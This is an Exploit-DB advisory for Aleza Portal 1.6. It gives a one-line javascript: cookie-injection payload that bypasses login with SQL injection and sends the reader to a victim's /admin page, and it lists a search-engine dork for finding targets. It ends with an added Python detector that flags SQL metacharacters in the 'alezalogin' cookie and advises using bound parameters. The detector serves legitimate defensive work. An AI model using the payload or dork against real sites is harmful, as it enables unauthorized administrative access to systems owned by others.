Aleza Portal 1.6 – Insecure SQL Injection / Cookie Handling

  • Author: KnocKout
    Date: 2010-09-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15144/
  • Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling 
    =========================================================
    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout 
    [~] Contact : knockoutr@msn.com
    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~Web App. : Aleza Portal v1.6
    ~Software: http://www.webavail.com/
    -Demo : http://www.webavail.com/alezademo/
    ~Vulnerability Style : (SQLi) Cookie Handling
    ~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    ~~~~~~~~ Exploitation ~~~~~~~~~~~
    
    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
    ================================
    [+]Exploitable Browser Injected!
    
    [+] Go to : http://[Victim]/admin
    
    
    GoodLucK ;)
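
For defenders, an added detection example (not part of the original advisory or of Aleza Portal): it checks Cookie request headers for an `alezalogin` cookie whose `login`/`pass` sub-fields carry SQL metacharacters, as in the string above. The sample requests, the client addresses and the rule that legitimate values never contain quotes or SQL keywords are assumptions made for the example.

```python
import re
from urllib.parse import unquote

COOKIE_NAME = "alezalogin"  # cookie name taken from the advisory
# Assumption: legitimate login/pass values never contain quotes, SQL comment
# markers or bare boolean/query keywords.
SUSPICIOUS = re.compile(r"""['"]|--|/\*|\b(?:or|and|union|select)\b""", re.I)

def parse_cookie_header(header):
    """Return {name: raw_value} for each cookie in a Cookie request header."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def flag_request(header):
    """Return the alezalogin sub-fields whose decoded value looks like SQL."""
    raw = parse_cookie_header(header).get(COOKIE_NAME)
    if raw is None:
        return []
    hits = []
    # Decode first so a percent-encoded payload is split and checked the same way.
    for pair in unquote(raw).split("&"):
        key, _, value = pair.partition("=")
        if SUSPICIOUS.search(value):
            hits.append(key)
    return sorted(hits)

def scan(requests):
    """Return (client, flagged_fields) for every request that trips the check."""
    return [(ip, hits) for ip, header in requests if (hits := flag_request(header))]

# Constructed sample data: (client address, Cookie header) pairs.
SAMPLE_REQUESTS = [
    ("192.0.2.10", "alezalogin=login=alice&pass=5f4dcc3b; theme=dark"),
    ("192.0.2.66", "alezalogin=login='or'level=11&pass='or'"),
    ("192.0.2.67", "theme=light; alezalogin=login=%27or%27level%3D11&pass=%27or%27"),
    ("192.0.2.11", "theme=dark"),
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_REQUESTS):
        print(f"{ip}: suspicious {COOKIE_NAME} fields {hits}")
```

Detection of this kind is a stopgap; the underlying fix is to build the login query with bound parameters and to keep authentication state server-side rather than in a client-editable cookie.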